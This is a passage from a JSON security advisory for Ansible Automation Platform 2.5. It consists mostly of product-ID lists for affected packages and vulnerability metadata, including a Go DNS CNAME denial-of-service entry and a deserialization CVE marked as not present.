"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "net: golang: Go net package: Denial of Service via long CNAME response in LookupCNAME"
},
{
"cve": "CVE-2026-34993",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2026-06-02T20:01:12.690409+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
